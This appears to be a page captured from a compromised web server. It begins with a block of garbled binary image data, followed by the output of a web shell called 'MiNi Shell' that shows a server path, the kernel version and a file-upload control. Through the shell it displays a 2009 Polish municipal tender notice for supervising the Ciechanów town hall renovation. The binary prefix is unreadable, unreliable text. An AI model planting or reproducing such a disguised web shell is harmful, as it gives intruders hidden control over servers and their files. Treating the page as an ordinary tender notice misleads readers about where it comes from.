JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090227/43694-N-2009.html

<p class="kh_header"><b>Ciechanów: Nadzór inwestorski dla zadania: Rewitalizacja i rozbudowa ratusza w Ciechanowie - etap I.</b><br>
<b>Numer ogłoszenia: 43694 - 2009; data zamieszczenia: 27.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Ciechanów reprezentowana przez Prezydenta Miasta Ciechanów , Plac Jana Pawła II 6, 06-400 Ciechanów, tel. 023 6749200, faks 0 23 672 29 63.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umciechanow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór inwestorski dla zadania: Rewitalizacja i rozbudowa ratusza w Ciechanowie - etap I..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sprawowanie kompleksowego nadzoru inwestorskiego nad realizacją zadania inwestycyjnego pn.: Rewitalizacja i rozbudowa ratusza w Ciechanowie - etap I. 
2. Do obowiązków Wykonawcy należy pełny zakres czynności określonych w przepisach art. 25 i 26 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tj. Dz. U. 2006 nr 156 poz. 1118 ze zm.) i będzie obejmował w szczególności nadzór inwestorski w zakresie specjalności:
1.konstrukcyjno-budowlanej;
2.architektonicznej;
3.instalacyjnej, w zakresie sieci instalacji urządzeń elektrycznych i elektroenergetycznych, 
4.instalacyjnej, w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
5.teletechnicznych;
6.archeologicznej i do prowadzenia robót budowlanych przy zabytku wpisanym do rejestru zabytków.
3.  Wyznaczenie inspektora nadzoru branży ogólnobudowlanej na koordynatora całego nadzoru inwestorskiego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9, 71.35.19.14-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 5 000 zł (słownie: pięć tysięcy złotych) w formach dopuszczalnych przez ustawę P.z.p.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1 O udzielenie zamówienia mogą się ubiegać się Wykonawcy, którzy:
1.1 Posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
a)	Przez posiadanie uprawnień Zamawiający rozumie dopuszczenie do obrotu gospodarczego i prowadzenie działalności gospodarczej w zakresie - zgodnym z przedmiotem zamówienia.
1.2 Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj. 
- wykażą się doświadczeniem przy nadzorowaniu w imieniu inwestora (przynajmniej jedno zadanie) robót budowlanych w obiekcie podlegającym ochronie konserwatorskiej o kubaturze co najmniej 4000,00 m3 zrealizowanym w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie;
1.3 Przez potencjał techniczny oraz osoby zdolne do wykonania zamówienia, Zamawiający rozumie dysponowanie osobami posiadającymi kwalifikacje do nadzorowania prac budowlanych, gdzie przez kwalifikacje rozumie się aktualną przynależność do właściwej izby samorządów zawodowych i posiadanie uprawnień budowlanych bez ograniczeń do kierowania robotami budowlanymi w specjalności:
- konstrukcyjno-budowlanej, 
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 
-instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych, i elektroenergetycznych, 
-telekomunikacyjnej,
1.4 Przez potencjał techniczny oraz osoby zdolne do wykonania zamówienia w przypadku nadzoru prac budowlanych w obiektach zabytkowych oraz prac ziemnych z nadzorem archeologicznym, Zamawiający rozumie dysponowanie osobami posiadającymi kwalifikacje:
a)	do nadzorowania prac budowlanych w obiektach zabytkowych; 
b)	archeologiczne do nadzorowania prac ziemnych. 
1.5 Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
a)	Wykonawcy winni posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z wykonywaniem funkcji nadzoru inwestorskiego zgodnie ze złożoną ofertą, na sumę ubezpieczenia nie mniejszą niż 70% wartości oferty.
1.6 Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust 1 i 2, oraz spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
1.7 Ocena spełnienia warunków dokonana będzie w oparciu o oświadczenia i dokumenty, które ma dostarczyć Wykonawca zgodnie z formułą spełnia/niespełnia.
1.8.Zgodnie z art. 23 ustawy p.z.p., Wykonawcy mogą wspólnie ubiegać się o udzielnie zamówienia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I.
1. Oferta zgodna z formularzem oferty wraz z załącznikami;
2. Oświadczenie nr 1 w sprawie spełniania przez Wykonawcę warunków art. 22 ust. 1 i nie podlegania wykluczeniu na podstawie art. 24 ust. 1 i ust. 2 ustawy P.z.p.;
3.Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej w zakresie koniecznym do wykonania zamówienia (dokument nie może być wystawiony wcześniej niż 6 miesięcy przed upływem terminu składania ofert);
4.Wykaz wykonanych usług w okresie ostatnich trzech  lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem   usłudze stanowiącej przedmiot zamówienia, polegającej na nadzorze inwestorskim robót budowlanych w obiekcie podlegającym ochronie konserwatorskiej  o kubaturze, co najmniej 4000,00 m3. Do wykazu należy dołączy dokumenty potwierdzające, że usługa została wykonana należycie;
5.Oświadczenie nr 2 w sprawie spełniania przez Wykonawcę warunku nie podlegania wykluczeniu na podstawie art. 24 ust. 2 ustawy P.z.p.;
6.Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. Inspektor nadzoru inwestorskiego, który w imieniu Wykonawcy będzie uczestniczył w realizacji zamówienia, musi posiadać kwalifikacje i uprawnienia budowlane określone w art. 12 i 14 ustawy Prawo Budowlane. Do załącznika nr 6 do oferty należy dołączyć min 1 kopię uprawnień budowlanych bez ograniczeń  o specjalności: 
-konstrukcyjno-budowlanej dla inspektora nadzoru robót ogólnobudowlanych i architektonicznych 
-instalacyjnej w zakresie sieci, instalacji i  urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych dla inspektora nadzoru robót wod-kan,
-telekomunikacyjnej dla inspektora nadzoru robót teletechnicznych, 
-instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych, i elektroenergetycznych dla inspektora nadzoru robót elektrycznych, 
oraz należy dołączyć kopię aktualnego zaświadczenia z Okręgowej Izby Inżynierów Budownictwa o przynależności i posiadaniu wymaganego ubezpieczenia o odpowiedzialności cywilnej, aktualne na dzień otwarcia ofert dla wszystkich branż jw.
Inspektor nadzoru - koordynator prac musi posiadać uprawnienia budowlane w specjalności konstrukcyjno - budowlanej oraz może być jednocześnie inspektorem nadzoru robót ogólnobudowlanych i architektonicznych. 
W przypadku wykazania w wykazie osób, którymi Wykonawca będzie dysponował, należy wraz z wykazem złożyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia;
7.Dokumenty potwierdzające, że osoba pełniąca funkcje inspektora nadzoru robót ogólnobudowlanych posiada wymagane przepisami prawa kwalifikacje do nadzorowania prac budowlanych przy zabytkach nieruchomych, tzn.:
a) oświadczenie nr 3 Wykonawcy o odbyciu przez inspektora nadzoru 2 - letniej praktyki zawodowej na budowie przy zabytkach nieruchomych, o której mowa w § 8 ust. 1 rozp. z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. nr 150, poz. 1579), sporządzone na podstawie wzoru - dodatek nr 6 do SIWZ, albo
b) zaświadczenie wojewódzkiego konserwatora zabytków, wydane na podstawie § 19 rozp. z dnia 24 sierpnia 1964 r. w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach i archeologicznych prac wykopaliskowych (Dz. U. Nr 31, poz. 197), albo
c) zaświadczenie wojewódzkiego konserwatora zabytków, wydane na podstawie § 17 - 20 rozp. z dnia 11 stycznia 1994 r. o zasadach i trybie udzielania zezwoleń na prowadzenie prac konserwatorskich przy zabytkach oraz prac archeologicznych i wykopaliskowych, warunkach ich prowadzenia i kwalifikacjach osób, które mają prawo prowadzenia tej działalności (Dz. U. Nr 16, poz. 55);
8. Dokumenty potwierdzające, że osoba pełniąca funkcje nadzoru archeologicznego prac ziemnych przy prowadzonych robotach budowlanych w obrębie budynku wpisanego do rejestru zabytków posiada wymagane prawem kwalifikacje tzn.:
- należy przedłożyć poświadczoną za zgodność z oryginałem kserokopię dyplomu ukończenia wyższych studiów na kierunku archeologii oraz udokumentowanie odbycia przynajmniej dwunastomiesięcznej praktyki zawodowej w zakresie wymaganych przepisami - badań archeologicznych. 
9. Aktualna polisa lub dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z wykonywaniem funkcji nadzoru inwestorskiego zgodnie ze złożoną ofertą, na sumę ubezpieczenia nie mniejszą niż 70% wartości oferty;
10. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
11.Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
12. Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że Wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie  w całości wykonania  decyzji organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
13.Upoważnienie do podpisania oferty podpisane przez osoby upoważnione do zaciągania zobowiązań w imieniu Wykonawcy;
14.Opracowany i podpisany formularz cenowy;
15.Podpisany wzór umowy przez upoważnionych przedstawicieli Wykonawcy;
16.Dokument potwierdzający wniesienie wadium.
II.
Każdy z Wykonawców wchodzących w skład konsorcjum winien dostarczyć dokumenty, o których mowa w punkcie 2, 3, 5, 10, 11, 12, tabeli nr 1 jw. wystawione indywidualnie dla każdego z uczestników konsorcjum; ww. dokumenty winny być podpisane zarówno przez lidera konsorcjum, jak i przez osoby uprawnione do reprezentowania poszczególnych uczestników konsorcjum;
Wykonawcy wchodzący w skład konsorcjum winni dostarczyć pozostałe dokumenty wskazane w tabeli j.w., potwierdzające łączne spełnianie przez nich warunków udziału w postępowaniu określonych w niniejszej SIWZ. 
III.
Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej 
1 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o którym mowa 
1) w pkt. 3, 11, 12 tab. Nr 1 składa dokument lub dokumenty potwierdzające odpowiednio, że: 
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
2) w pkt. 10 tab. Nr 1 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
2 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt. 1 zastępuje się je dokumentami zawierającymi oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym lub organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
3 Dokument, o którym mowa w pkt. 4.5.1 ppkt 1 lit. a, c oraz ppkt 2 ( pkt 3, 10, 11 tabeli nr 1) musi być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt. 4.5.1 ppkt 1 lit. b (pkt 12 tabeli nr 1) musi być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umciechanow.pl;.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Ciechanów ul. Wodna 1, 06-400 Ciechanów Wydział Inwestycji..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2009 godzina 10:00, miejsce: W siedzibie Zamawiającego ul. Wodna 1, 06-400 Ciechanów, do biura podawczego (stanowisko nr 7 Biura Obsługi Interesanta na parterze budynku).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Otwarcie ofert nastąpi w siedzibie Zamawiającego Sala Konferencyjna (parter) dnia 16.03.2009 r. o godzinie 10:30.
2.Osobami upoważnionymi do bezpośredniego kontaktowania się z Wykonawcami i udzielania wyjaśnień są odpowiednio:
1) Justyna Tomkowska (w zakresie formalno-prawnym) - UMC, pokój nr 103, parter, ul. Wodna 1, 06-400 Ciechanów - tel. (023) 674-92-74,
2) Robert Szymaniak (w zakresie technicznym) - UMC, pokój nr 207, I piętro, ul. Wodna 1, 06-400 Ciechanów - tel. (023) 674-92-13

Creat By MiNi SheLL
Email: jattceo@gmail.com